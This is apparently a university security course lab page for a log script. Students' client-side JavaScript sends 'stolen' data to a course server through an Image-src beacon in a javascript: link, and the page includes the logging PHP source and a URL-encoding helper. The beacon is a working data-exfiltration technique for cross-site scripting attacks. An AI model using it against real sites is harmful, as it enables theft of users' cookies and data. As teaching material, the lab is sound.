Lab W - Log Script

You can use this server-side script to store automated log data from client-side JavaScript. For example, clicking this client-side hyperlink will cause data to be stored on our web server (dasak.csc.kth.se). It will be accessible here.

javascript:void((new Image()).src='http://dasak-vm-lab-server.eecs.kth.se/logger/log.php?' + 'to=' + '&payload=' + '&random=' + Math.random());

The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding. The void(...); construct prevents the browser from navigating to a new page consisting of the contents of the expression (which is what it normally does when it encounters a non-void expression like javascript:2+2).
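
An added example (not part of the lab's own code) of the URL encoding mentioned above: it builds the same log request with raw and with percent-encoded values and shows what arrives in each case. The function names and the sample alias and payload are constructed for illustration, and `parseAsServer` only approximates the server's query parsing with `URLSearchParams`.

```javascript
// Added example, not the lab's own code. The endpoint is the one shown on
// this page; the function names and sample values are hypothetical.
const LOG_ENDPOINT = 'http://dasak-vm-lab-server.eecs.kth.se/logger/log.php';

// Percent-encode one query value. encodeURIComponent leaves "'" alone, which
// would end the quoted string inside a javascript: link, so encode it too.
function enc(value) {
  return encodeURIComponent(value).replace(/'/g, '%27');
}

// Naive concatenation: values pasted into the query string as they are.
function buildLogUrlRaw(to, payload) {
  return LOG_ENDPOINT + '?to=' + to + '&payload=' + payload +
         '&random=' + Math.random();
}

// Same request with every value encoded; random only defeats the cache.
function buildLogUrl(to, payload) {
  return LOG_ENDPOINT + '?to=' + enc(to) + '&payload=' + enc(payload) +
         '&random=' + Math.random();
}

// The single-line javascript: form of the encoded request.
function buildJavascriptLink(to, payload) {
  return "javascript:void((new Image()).src='" + LOG_ENDPOINT + '?to=' +
         enc(to) + '&payload=' + enc(payload) +
         "&random=' + Math.random());";
}

// Approximation of what the server sees in its query parameters (assumes
// URLSearchParams decodes %XX and '+' the same way the server does).
function parseAsServer(url) {
  const q = new URL(url).searchParams;
  return { to: q.get('to'), payload: q.get('payload'), keys: [...q.keys()] };
}

// Constructed sample containing a newline, '=', '&', '+' and a quote.
const SAMPLE = "line one\nk=a&b+c'd";
console.log(parseAsServer(buildLogUrlRaw('youralias', SAMPLE)));
console.log(parseAsServer(buildLogUrl('youralias', SAMPLE)));
console.log(buildJavascriptLink('youralias', SAMPLE));
```

With raw values the newline is dropped by the URL parser and the `&` starts an extra parameter, so the logged payload is truncated; with encoded values the payload arrives unchanged.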

Test form

If you just want to try out the script, you can use this form. (For the programming project, you'll probably want to use the JavaScript image technique shown above.)

To: (your personal alias to be able to find your entry in the log afterwards)
Payload: (the information you stole)

Source code

In case you are curious, here is the source code of this page.

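<?php
  //$from = "zoobar@dasak.csc.kth.se";
  // Read the query parameters; isset() avoids a notice when one is missing.
  $to = isset($_GET['to']) ? $_GET['to'] : "";
  // Strips tags and encodes quotes (FILTER_SANITIZE_STRING is deprecated as of PHP 8.1).
  $to = filter_var($to, FILTER_SANITIZE_STRING);
  $payload = isset($_GET['payload']) ? $_GET['payload'] : "";
  $payload = filter_var($payload, FILTER_SANITIZE_STRING);
  // Log file that receives one line per stored entry.
  $filelog = "/tmp/getdasakzoobarlogfile.txt";
?>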
<!DOCTYPE html> 

<head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">

  <link rel="stylesheet" type="text/css" href="labs.css" />
  <title>Lab W - Log Script</title>
</head>

<body>
  <h1>Lab W - Log Script</h1>
  <p>You can use this server-side script to store automated log data from client-side JavaScript. For example, clicking this client-side hyperlink will cause data to be stored on our web server (dasak.csc.kth.se). It will be accessible <a href="/logger/print.php">here</a>.
  </p>
    <pre class="tty"><?php 
    $link = "javascript:void((new" .
            " Image()).src=" . 
            "'http://dasak-vm-lab-server.eecs.kth.se/logger/log.php?'" . 
            " + 'to=$to'" .
            " + '&amp;payload=$payload' + '&amp;random='" . 
            " + Math.random());";
    echo "<a href=\"$link\">$link</a>";
    ?></pre>
    <p>The random argument is ignored, but ensures that the browser 
bypasses its cache when downloading the image. We suggest that you use 
the random argument in your scripts as well. Newlines are not allowed 
in <span style="font-family: monospace;">javascript:</span> links; if this bothers you, try 

<a href="http://scriptasylum.com/tutorials/encode-decode.html">URL encoding</a>.
The <code>void(...);</code> construct prevents the browser from 
navigating to a new page consisting of the contents
of the expression (which is what it normally does when it encounters a 
non-void expression like <code><a href="javascript:2+2">javascript:2+2</a></code>). </p>
<h2>Test form</h2>
<p>If you just want to try out the script, you can use this form.
      (For the programming project, you'll probably
want to use the JavaScript image technique shown above.)</p>
<form method="get">
<div>
<b>To:</b> 
<input name="to" size="40" placeholder="youralias" /><i>(your personal alias to be able to find your entry in the log afterwards)</i>
</div>
<div>
</div>
<div>
<b>Payload:</b>
<input name="payload" placeholder="abcdefg" size="40" />
<i>(the information you stole)</i>
</div>
<div>
<input type="submit" value="Store" name="send_submit" />

<?php
  if($to) {
/*
    if(!preg_match("/^[a-z0-9_\-\+]+@kth.se$/i", $_REQUEST['to'])) {
      echo "Please use an @kth.se e-mail address";
    } else {
*/
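      $fp = fopen($filelog, "a");

      // https://www.php.net/manual/en/function.flock.php
      if ($fp === false) {
          // fopen() failed, so there is no handle to lock or write to
          echo "<em>Couldn't open the log file!</em>";
      } else {
          if (flock($fp, LOCK_EX)) {  // acquire an exclusive lock
              //ftruncate($fp, 0);      // truncate file
              $nowstr = date('Y-m-d H:i:s');
              // one record per line: timestamp ::: alias ::: payload
              fwrite($fp, "$nowstr ::: $to ::: $payload\n");
              fflush($fp);            // flush output before releasing the lock
              flock($fp, LOCK_UN);    // release the lock
              echo "<em>Saved!</em>"; // report success only after the write
          } else {
              echo "<em>Couldn't get the lock!</em>";
          }

          fclose($fp);
      }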
/*
    }
*/
  }
?>
</div>
<h2>Source code</h2>
<p>In case you are curious, here is the source code of this page.</p>
<pre><?php echo htmlspecialchars(file_get_contents(__FILE__)); ?></pre>
</form>
</body>
</html>